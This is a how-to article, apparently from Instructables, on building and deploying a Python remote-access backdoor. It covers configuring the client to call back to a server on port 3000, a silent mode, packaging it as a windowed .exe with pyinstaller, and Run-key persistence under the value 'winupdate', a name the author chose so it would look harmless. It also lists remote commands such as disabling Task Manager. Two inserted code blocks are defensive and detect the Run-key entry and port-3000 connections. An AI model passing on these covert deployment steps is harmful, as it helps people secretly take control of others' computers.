Introduction: Simple Python Backdoor
So almost a year after my instructable on the Simple Netcat Backdoor, I was inspired to create a similar but more feature-filled version using the Python programming language, simply because it's a fairly simple language compared to others. If you don't know what a backdoor is, it's basically a way to connect to and control someone's computer. This one has many advantages over the netcat one, such as a much simpler install and usage, and it is very easy to use outside of your network. I even included a remote cmd, so you can run any commands as before with this one. Also, since the server is now cross-platform, you can accept connections on a Linux server.
Anyway, you can download the latest stable version here.
NOTE: This program is still a bit of a work in progress; I hope to include a few more features in the future. This project is also available on the GitHub page.
Step 1: Installing Prerequisites...
Since this program is made in Python 3, go ahead and download the latest version from here. You will also need the following modules:
To install, simply run the installer for Pywin32. For the other modules, you can install them by running python -m pip install "file path" as in the picture above.
Obviously, you will need a Windows computer to install these modules in order to build the client.
Step 2: Setup...
To configure the client, open up client.py with IDLE or any other editor; you should see the code above.
The first thing you need to do is configure the IP address to connect to, so set strHost to the IP the client should connect to. Or, if you plan to use the program with DNS, remove the "#" on the line below and fill in your hostname between the quotes, e.g. myserver113.ddns.net.
Finally, if you want to ensure that the program runs in completely silent mode, remove the first "#" on line 8.
NOTE: If you plan on using the program outside of your network, you must port forward port 3000. If you are using a server such as one from DigitalOcean, no port forwarding is required :).
Step 3: Build to .exe
In order to allow anyone without Python and the modules to run the file, you must build it to an .exe. To build, open up a command prompt and run the following command:
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed
What this does is exclude the unused tkinter modules to save on file size and then create a single executable.
NOTE: You can add your own icon by adding --icon="icon path"
Step 4: Usage...
Before you can run the server, you must disable your firewall or allow port 3000 in order to accept incoming connections. After that, you can run the server to listen for connections.
Once you get a connection, you can type "--help", and you should get a prompt as in pic 1. Next you can interact with the user by typing "--i client id".
Next, you should see a menu appear as in pic 2, and now you can run any command you want such as "--m" to send a message, "--e" to open remote cmd, etc. You can also use "--b" so you can move the connection to the background and interact with another computer.
As I said, you can do anything you originally did with the netcat backdoor, only more.
NOTE: It's always best to do a graceful shutdown by running "--x" in the main menu instead of closing the window.
NOTE: When using "--x 2" and "--x 3", you can also add a custom shutdown message by adding the message after the command, e.g. "--x 3 Windows Shutdown".
Step 5: Uninstalling...
If you ever added this program to the startup and want to remove it, simply open up the registry and navigate to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run". Then delete the value called "winupdate". I gave it a non-suspicious name so that it won't get deleted by accident ;).
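The Run-key entry described above is also what a defender would look for on an affected machine. The following is an added example, not code from the original project: it triages the text output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, and it generalizes beyond the literal "winupdate" name to any system-sounding value whose executable sits outside the usual OS and vendor directories. The sample output, user name, paths and heuristics are assumptions made for illustration.

```python
import re

# Run-key value name the tutorial's client uses (taken from the page).
KNOWN_NAME = "winupdate"
# Assumption: names imitating OS components deserve a path check.
SYSTEM_LIKE = re.compile(r"win|update|microsoft|svchost", re.I)
# Assumption: genuine OS/vendor autoruns live under these prefixes.
TRUSTED = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\",
           "%windir%\\", "%systemroot%\\", "%programfiles%\\")
# One value row of `reg query` output: name, type, data split by 4 spaces.
ROW = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")

def image_path(data):
    """Return the executable path from a Run value (quoted or bare)."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)\b", data, re.I)
    return m.group(1) if m else data.split(" ", 1)[0]

def triage_run_key(reg_query_output):
    """List (name, path, reasons) for Run values worth a closer look."""
    findings = []
    for line in reg_query_output.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        name, path = m["name"], image_path(m["data"])
        reasons = []
        if name.lower() == KNOWN_NAME:
            reasons.append("value name used by this tutorial's client")
        if SYSTEM_LIKE.search(name) and not path.lower().startswith(TRUSTED):
            reasons.append("system-like name, image outside trusted dirs")
        if reasons:
            findings.append((name, path, reasons))
    return findings

# Constructed sample of `reg query` output; user name and paths are made up.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    MicrosoftEdgeAutoLaunch    REG_SZ    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
    winupdate    REG_SZ    C:\Users\alice\AppData\Roaming\client.exe
"""

if __name__ == "__main__":
    for name, path, reasons in triage_run_key(SAMPLE):
        print(f"{name}: {path} -> {'; '.join(reasons)}")
```

A renamed value still trips the second rule as long as the name imitates a system component, which is why the path check matters more than the literal name.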
Step 6: Explanation...
So I could spend pages writing on how I made every feature, but instead I will explain generally how this entire program works.
The program works by first having a server listen on a port for incoming connections from the client; in this case I chose port 3000. Next, the client connects to the server on that port and then waits for the server to send it commands. In my case the commands are just simple strings of text such as "dtaskmgr", which tells the client to disable Task Manager. It's very simple actually. The server never communicates directly with the client's PC; instead it communicates with the client program, which then runs the commands specified.
One more thing about sending data over a socket is that the data must be sent as bytes, which means you will see the server and the client constantly decoding the messages to standard text.
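Because the client dials out to the server's port 3000 and then holds the connection open, the design above is visible in a host's connection table. The following is an added example, not code from the original project: it parses `netstat -ano` output and reports which process IDs are listening on, or connected to, that port. The sample output, addresses and PIDs are constructed, and the function and role names are hypothetical.

```python
C2_PORT = 3000  # port the tutorial's server listens on (from the page)

def split_endpoint(endpoint):
    """Split '203.0.113.7:3000' or '[::1]:3000' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)

def find_port_hits(netstat_output, port=C2_PORT):
    """Return (role, address, pid) for TCP rows that involve `port`."""
    hits = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue  # header, UDP rows (no state column), blank lines
        lhost, lport = split_endpoint(parts[1])
        rhost, rport = split_endpoint(parts[2])
        state, pid = parts[3], int(parts[4])
        if state == "LISTENING" and lport == port:
            hits.append(("listener", lhost, pid))         # server side
        elif state == "ESTABLISHED" and rport == port:
            hits.append(("client-outbound", rhost, pid))  # client calling out
        elif state == "ESTABLISHED" and lport == port:
            hits.append(("server-inbound", rhost, pid))   # accepted client
    return hits

# Constructed `netstat -ano` sample; addresses and PIDs are made up.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1044
  TCP    192.168.1.20:49712     203.0.113.7:3000       ESTABLISHED     6120
  TCP    192.168.1.20:49730     198.51.100.9:443       ESTABLISHED     3308
  TCP    [::1]:49670            [::1]:49671            ESTABLISHED     4
  UDP    0.0.0.0:5353           *:*                                    2200
"""

if __name__ == "__main__":
    for role, addr, pid in find_port_hits(SAMPLE):
        print(f"{role}: {addr} (PID {pid})")
```

Port 3000 is also a common default for local development servers, so a hit is a lead to follow up by PID, not a verdict.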
Anyway, that's pretty much all that goes into making a backdoor. You will notice I lightly commented the code, so if you know a little Python, it should be fairly easy to understand.
Step 7: Done!
Have fun with this program! It can be especially helpful for helping friends/relatives who do not live close by.
I hope you found this instructable useful, and if you have any questions or concerns, please leave a comment or PM me.
Also, if you find any bugs in this program, or feel a feature is missing or would be useful to include, please report it to me.
Please use this program responsibly and legally; I am not responsible for anything you do.